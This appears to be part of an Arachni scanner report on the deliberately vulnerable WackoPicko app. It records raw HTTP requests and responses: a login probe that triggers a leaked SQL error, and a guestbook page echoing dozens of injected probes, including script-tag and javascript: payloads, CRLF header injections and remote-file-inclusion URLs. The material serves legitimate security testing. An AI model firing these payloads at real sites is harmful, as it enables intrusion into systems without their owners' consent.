0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | <form action="/WackoPicko/users/login.php" method="POST"> <tr> <td> Username : </td> <td> <input type="text" name="username"> </input> </td> </tr> <tr> <td> Password : </td> <td> <input type="password" name="password"> </input> </td> </tr> <tr> <td> <input type="submit" value="login"> </input> </td> <td> <a href="/WackoPicko/users/register.php"> Register </a> </td> </tr> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/users/login.php | http://192.168.0.26/WackoPicko/users/login.php |
|
|
Raw HTTP request used to retrieve the page.
POST /WackoPicko/users/login.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72 Content-Length: 126 Content-Type: application/x-www-form-urlencoded username=arachni_name%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27&password=5543%21%25arachni_secret
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:54 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 203
Content-Type: text/html
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-;<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>'' and `password` = SHA1( CONCAT('5543!' at line 1
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/login.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-23 first last">
<h2>Login</h2>
<table style="width:320px" cellspacing="0">
<form action="/WackoPicko/users/login.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
form
input
comment
using
POST
at
http://192.168.0.26/WackoPicko/guestbook/
pointing to
http://192.168.0.26/WackoPicko/guestbook.php
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> </br> <input type="text" name="name"> </input> <br> </br> Comment: <br> </br> <textarea id="comment-box" name="comment"> </textarea> <br> </br> <input type="submit" value="Submit"> </input> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/guestbook/ | http://192.168.0.26/WackoPicko/guestbook.php |
|
|
Raw HTTP request used to retrieve the page.
POST /WackoPicko/guestbook.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72 Content-Length: 72 Content-Type: application/x-www-form-urlencoded comment=1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E&name=arachni_name
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:03 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1772
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">1</p>
<p> - by arachni_name%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3 </p>
<p class="comment">1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27 </p>
<p class="comment">1</p>
<p> - by arachni_name()"&%1'-;<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>' </p>
<p class="comment">1</p>
<p> - by arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E </p>
<p class="comment">1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/></p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:"</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name]]]]]]]]] </p>
<p class="comment">1]]]]]]]]]</p>
<p> - by arachni_name </p>
<p class="comment">1<!--</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name#^($!@$)(()))****** </p>
<p class="comment">1</p>
<p> - by arachni_name'" </p>
<p class="comment">1</p>
<p> - by arachni_name<!-- </p>
<p class="comment">1#^($!@$)(()))******</p>
<p> - by arachni_name </p>
<p class="comment"></script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script></p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1'"</p>
<p> - by arachni_name </p>
<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
<p> - by arachni_name </p>
<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
<p class="comment">1</p>
<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
<p> - by arachni_name </p>
<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/guestbook/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
form
input
name
using
POST
at
http://192.168.0.26/WackoPicko/guestbook/
pointing to
http://192.168.0.26/WackoPicko/guestbook.php
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> </br> <input type="text" name="name"> </input> <br> </br> Comment: <br> </br> <textarea id="comment-box" name="comment"> </textarea> <br> </br> <input type="submit" value="Submit"> </input> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/guestbook/ | http://192.168.0.26/WackoPicko/guestbook.php |
|
|
Raw HTTP request used to retrieve the page.
POST /WackoPicko/guestbook.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72 Content-Length: 72 Content-Type: application/x-www-form-urlencoded comment=1&name=arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:04 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1801
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
